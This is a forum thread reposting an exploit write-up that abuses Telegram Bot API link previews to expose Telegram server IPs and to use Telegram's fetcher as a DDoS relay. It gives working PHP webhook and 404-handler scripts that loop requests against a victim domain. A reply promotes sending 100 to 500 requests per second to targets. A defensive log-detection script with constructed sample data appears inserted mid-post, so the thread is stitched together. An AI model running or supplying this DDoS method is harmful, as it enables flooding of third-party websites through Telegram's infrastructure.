Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

Admin

Administrator
Code:
###########################

# Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

###########################

# Exploit Title : Telegram Bot API CSRF Vulnerability and use it as a ddoser
# Exploit Author : 4L1R3Z4
# Date : 2016/08/15
# Google Dork : No
# Home Page : https://core.telegram.org/bots/api
# Category : Web Application
# Discovered by : 4L1R3Z4
==============================
# Description :
==============================
In the new version of the Telegram Bot API, a new object called "MessageEntity" permits you to send URLs as
a message. Through this object, we can get a GET request from the Telegram server.
Telegram doesn't check whether the image is real or not, and it also doesn't have a captcha or security token,
so we can run our PHP files through the Telegram server.
==============================
# Proof Of Concepts :
==============================
In this section, I'll show you how you can grab the Telegram server IP.
Create a folder named "tg" on your host and create a .htaccess file in it with the following contents:
-------------
ErrorDocument 404 /tg/log.php
-------------
And this is the "log.php":
--------------------------------------------
<?php
function getUserIP()
{
  $client  = @$_SERVER['HTTP_CLIENT_IP'];
  $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  $remote  = $_SERVER['REMOTE_ADDR'];
  if(filter_var($client, FILTER_VALIDATE_IP))
  {
  $ip = $client;
  }
  elseif(filter_var($forward, FILTER_VALIDATE_IP))
  {
  $ip = $forward;
  }
  else
  {
  $ip = $remote;
  }
  return $ip. PHP_EOL;
}
$user_ip = getUserIP();
$logfile= 'log.txt';
$fp = fopen($logfile, "a");
fwrite($fp, $user_ip, strlen($user_ip));
fclose($fp);
?>
----------------------------------------------
and a file called "request.php" with these contents:
-----------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
?>
-------------------------
Then activate the webhook for your bot and set the "request.php" address as the webhook.
Then send a message to your bot; if you did everything right, the IP will be written to the "log.txt" file.


************
************ Exploiting it to ddos
************

Change request.php with this:
--------------------------------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
for($i=0;$i<100;$i++){
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
}
?>
--------------------------------------------

and change log.php with this:

--------------------------------------------
<?php
echo file_get_contents("http://exampledomain.com");
?>
---------------------------------------------

This code will send 100 requests to "exampledomain.com" from the Telegram IP.
You can increase or decrease the number of requests depending on your server's capabilities.
You can also exploit it through IRC servers if your server is not strong.


Exploited by 4L1R3Z4
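From the defender's side, what a web host running the setup above actually sees is a burst of 404s to random 50-character `.png` names under `/tg/`, each of which the `ErrorDocument` handler turns into an outbound request. The following is an added detection example, not code from the post: it parses Apache combined-format access-log lines (the sample lines, IPs and user agent are constructed) and flags any source that produces a burst of trigger-shaped 404s within a short window.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" access-log line; status and path are what the check keys on.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Shape of the trigger URLs in the post: /tg/<50 chars of [0-9a-z]>.png, which
# never exist on disk and so always land in the ErrorDocument 404 handler.
TRIGGER_PATH = re.compile(r'^/tg/[0-9a-z]{50}\.png$')

def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_trigger_bursts(lines, window_s=10, threshold=20):
    """Map source IP -> total trigger-shaped 404s for every source that produced
    at least `threshold` of them inside some `window_s`-second span."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404 and TRIGGER_PATH.match(rec["path"]):
            hits[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in hits.items():
        stamps.sort()
        lo = 0
        for hi in range(len(stamps)):          # sliding window over sorted times
            while (stamps[hi] - stamps[lo]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 >= threshold:       # a lone broken-link fetch never gets here
                flagged[ip] = len(stamps)
                break
    return flagged

# Constructed sample log (not real traffic): one normal page view, one stray 404
# from a second address, and a 25-request burst from a single fetcher address.
_FMT = '{ip} - - [15/Aug/2016:10:00:{s:02d} +0000] "GET {p} HTTP/1.1" {st} 0 "-" "preview-fetcher/1.0"'
SAMPLE_LINES = [_FMT.format(ip="203.0.113.9", s=0, p="/index.html", st=200),
                _FMT.format(ip="198.51.100.7", s=3, p="/tg/" + "0" * 50 + ".png", st=404)]
SAMPLE_LINES += [_FMT.format(ip="192.0.2.44", s=i // 5, p=f"/tg/{i:050x}.png", st=404)
                 for i in range(25)]
```

Running `find_trigger_bursts(SAMPLE_LINES)` returns `{'192.0.2.44': 25}`; the single stray 404 from the second address stays below the threshold.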
 

dkfancska

Member
Could you explain in more detail what to do with this?
 

Admin

Administrator
In the new version of the Telegram Bot API, a new object called "MessageEntity" lets you send URLs as
messages. Through this object, we can send a GET request from the Telegram server.
Telegram doesn't check whether the image is real or not, and it also has no captcha or security token, so we can run our PHP files through the Telegram server and send around 100-500 requests per second to the victim's site.
 

HATRED

Member
Thanks for the answer.